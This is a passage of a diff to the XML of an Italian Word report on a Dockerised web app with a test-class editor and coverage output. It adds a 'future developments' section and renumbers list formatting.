-        <w:t xml:space="preserve">L'opzione -d viene utilizzata per eseguire i container in background. Senza questa opzione, i container vengono eseguiti in modalità </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>foreground</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> e il loro output viene visualizzato nella console corrente. Quando si utilizza -d, i container vengono avviati in background e il controllo viene restituito al prompt immediatamente, consentendo all'utente di continuare a lavorare nella stessa console senza essere bloccato dall'output dei container.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Quindi, se si esegue </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -21591,37 +20603,37 @@
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Toc148518728"/>
       <w:r>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.2 Prova di esecuzione</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="45"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Una volta realizzata la procedura di installazione è possibile recarsi all’indirizzo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>localhost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, sarà mostrata la seguente schermata contenente l’editor per la classe di test:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.2 Prova di esecuzione</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="45"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Una volta realizzata la procedura di installazione è possibile recarsi all’indirizzo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>localhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, sarà mostrata la seguente schermata contenente l’editor per la classe di test:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DEC9179" wp14:editId="1AEBAA4E">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DEC9179" wp14:editId="4EFD6FEC">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:align>center</wp:align>
@@ -21778,19 +20790,19 @@
     <w:p>
       <w:proofErr w:type="gramStart"/>
       <w:r>
+        <w:t>Infine</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> è possibile consultare l’output della compilazione e visualizzare i risultati di coverage di utente e robot anche nella output window:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Infine</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> è possibile consultare l’output della compilazione e visualizzare i risultati di coverage di utente e robot anche nella output window:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713CCA17" wp14:editId="60BC0581">
             <wp:extent cx="5875529" cy="2042337"/>
@@ -21887,6 +20899,67 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titolo1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Sviluppi Futuri</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>backend</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> non ha sessione, ciò non permette l’utilizzo concorrente della web app.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Miglioramento sicurezza dell’applicazione</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Integrazione con gli altri task di creazione della partita</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1134" w:bottom="1134" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
@@ -23211,6 +22284,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="46B00487"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C5F2620C"/>
+    <w:lvl w:ilvl="0" w:tplc="16784EDC">
+      <w:start w:val="7"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4F2B7AEE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8C10D1BC"/>
@@ -23296,7 +22458,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5624794F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D1DA1036"/>
@@ -23409,7 +22571,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B1328E3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB8EF814"/>
@@ -23530,7 +22692,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="656940DD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="87E4C2EC"/>
@@ -23643,7 +22805,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66517D9C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2E34D1EA"/>
@@ -23729,7 +22891,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6921526C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E642CAE"/>
@@ -23842,7 +23004,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6A0C2E59"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EAAE920E"/>
@@ -23955,7 +23117,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CD506E0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BB589486"/>
@@ -24041,7 +23203,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="71FF0F7E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="04686D20"/>
+    <w:lvl w:ilvl="0" w:tplc="0410000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0410000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0410001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="721A19D2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0410001F"/>
@@ -24130,7 +23381,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7E857A97"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A42E2156"/>
@@ -24247,13 +23498,13 @@
     <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1644382291">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1841003184">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="368410221">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="2078554437">
     <w:abstractNumId w:val="8"/>
@@ -24262,10 +23513,10 @@
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1792623451">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="944922071">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="705757666">
     <w:abstractNumId w:val="4"/>
@@ -24274,7 +23525,7 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="448008474">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1834369856">
     <w:abstractNumId w:val="9"/>
@@ -24283,19 +23534,19 @@
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="628365184">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="1558542813">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="190075715">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="980227489">
     <w:abstractNumId w:val="16"/>
   </w:num>
-  <w:num w:numId="17" w16cid:durableId="980227489">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
   <w:num w:numId="18" w16cid:durableId="1415935907">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="2059015757">
     <w:abstractNumId w:val="11"/>
@@ -24308,6 +23559,12 @@
   </w:num>
   <w:num w:numId="22" w16cid:durableId="2108689433">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="1961107280">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1331836994">
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="19"/>
 </w:numbering>
